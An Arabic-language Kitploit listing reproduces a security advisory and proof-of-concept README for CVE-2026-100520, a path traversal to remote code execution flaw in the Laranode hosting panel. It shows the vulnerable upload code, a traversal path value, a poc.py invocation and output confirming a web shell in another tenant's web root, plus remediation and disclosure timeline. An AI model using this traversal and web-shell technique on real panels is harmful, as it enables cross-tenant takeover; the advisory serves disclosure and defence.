Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-100520-laranode-path-traversal — اجتياز المسار -> تنفيذ التعليمات البرمجية عن بُعد في Laranode < 1.2.1 (CWE-22). إثبات المفهوم + تقرير استشاري. | Kitploit
أدوات/GitHubGitHub/wvllxe/cve-2026-100520-laranode-path-traversal
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأداة الوصول عن بعد
GitHubwvllxe/cve-2026-100520-laranode-path-traversal

CVE-2026-100520-laranode-path-traversal

اجتياز المسار -> تنفيذ التعليمات البرمجية عن بُعد في Laranode < 1.2.1 (CWE-22). إثبات المفهوم + تقرير استشاري.

عرض المستودع
25منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-100520 — اجتياز المسار → تنفيذ تعليمات عن بُعد في Laranode File Manager

بحث أمني مصرّح به. إثبات المفهوم لأغراض دفاعية وتعليمية فقط.

CVSS 3.1 CVSS 4.0 CWE-22 Status

يسمح اجتياز المسار المُصادَق عليه في نقطة نهاية رفع الملفات في مدير الملفات الخاص بـ Laranode لمستأجر منخفض الصلاحيات بكتابة ملفات عشوائية خارج دليل home الخاص به — بما في ذلك قشرة ويب PHP داخل جذر ويب مستأجر آخر — مما يؤدي إلى تنفيذ تعليمات عن بُعد بصلاحيات ذلك المستأجر.

CVECVE-2026-100520
المنتجLaranode (لوحة تحكم استضافة متعددة المستأجرين، Laravel)
الإصدارات المتأثرة>= 0, < 1.2.1
تم الإصلاح فيv1.2.1
الثغرةاجتياز المسار (CWE-22) → كتابة ملفات عشوائية → تنفيذ تعليمات عن بُعد
الصلاحياتمُصادَق عليه (أي مستخدم لوحة منخفض الصلاحيات)
CVSS 3.18.8 HIGH — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.08.7 HIGH — AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H
اكتُشفت بواسطةAlisher Qarshibayev
الإشعار الأمنيVulnCheck · GHSA-34h2-2696-vfvr

السبب الجذري

يبني الملف app/Actions/Filemanager/UploadFileAction.php مسار الوجهة عبر ربط حقلي الطلب path وoriginalName المُقدَّمين من المستخدم مباشرةً بدليل home الخاص بالمستأجر — دون أي تقنين للمسار ودون أي فحص لاجتياز المسار:

// app/Actions/Filemanager/UploadFileAction.php  (< 1.2.1)
$r->validate([
    'file'         => 'required|file',
    'originalName' => 'required|string|max:255',
    'path'         => 'required|string',          // <-- attacker controlled, not sanitized
]);

$file = $r->file('file');

$path = '/home/' . $r->user()->systemUsername . '/' . $r->path;   // <-- traversal sink

File::append($path . '/' . $r->originalName, $file->get());        // <-- arbitrary write

المسار محمي بـ auth فقط — أي مستأجر مُصادَق عليه يمكنه الوصول إليه:

// routes/web.php
Route::post('/filemanager/upload-file', [FilemanagerController::class, 'uploadFile'])
     ->middleware(['auth'])->name('filemanager.uploadFile');

نظرًا لأن path يقبل تسلسلات ../، فإن قيمة مثل ../victim/public_html تتجاوز دليل home الخاص بالمتصل وتضع الملف المرفوع في جذر ويب مستأجر آخر. كتابة ملف .php هناك تؤدي إلى تنفيذ التعليمات البرمجية لحظة طلبه عبر HTTP.

إثبات المفهوم

المتطلبات: حساب صالح منخفض الصلاحيات على نسخة Laranode المستهدفة (هذه هي الصلاحية التي تفترضها الثغرة). يقوم إثبات المفهوم بتسجيل الدخول، وجلب رمز CSRF، وكتابة ملف PHP علامة داخل جذر ويب مستأجر مجاور عبر اجتياز المسار.

python3 poc.py \
    --url https://panel.example.com \
    --user [email protected] \
    --pass 'Password123' \
    --victim victimuser \
    --webroot public_html

النتيجة المتوقعة — يؤكد الخادم وجهة الكتابة خارج دليل home الخاص بالمهاجم:

[*] Logging in as [email protected] ...
[+] Authenticated, CSRF token acquired
[*] Uploading pwn_<rand>.php via path traversal ...
[+] Server destination: /home/victimuser/public_html/pwn_<rand>.php
[+] Verifying execution ...
[+] RCE confirmed: https://victim.example.com/pwn_<rand>.php -> CVE-2026-100520 <uname>

انظر poc.py. قشرة العلامة تشغّل فقط id/uname لإثبات التنفيذ — دون أي إجراءات تدميرية.

التأثير

  • كتابة ملفات عشوائية عبر المستأجرين على لوحة استضافة مشتركة.
  • تنفيذ تعليمات عن بُعد بصلاحيات أي مستأجر مُستضاف معًا → اختراق كامل لموقعه وبياناته.
  • خرق ضمان العزل الأساسي للوحة تحكم متعددة المستأجرين.

المعالجة

قم بالترقية إلى Laranode 1.2.1 (commit الإصلاح). يقوم الإصلاح بتطبيع المسار المُحلَّل ويرفض أي وجهة تتجاوز دليل home الخاص بالمستأجر (فحص احتواء realpath()). إرشادات عامة: لا تبنِ مسارات نظام الملفات من مدخلات المستخدم الخام أبدًا — قم بالتقنين وتأكد من بقاء النتيجة داخل دليل أساسي مسموح به.

الجدول الزمني

التاريخالحدث
2026-09-21تاريخ الإفصاح العام
2026-09-26حجز ونشر CVE-2026-100520 (VulnCheck)

الإفصاح

تم الإفصاح عنه بمسؤولية إلى المورّد وتم التنسيق عبر VulnCheck. تم الإصلاح في v1.2.1 قبل إصدار إثبات المفهوم هذا. نُشر لأغراض دفاعية وتعليمية.

تنزيل الأداة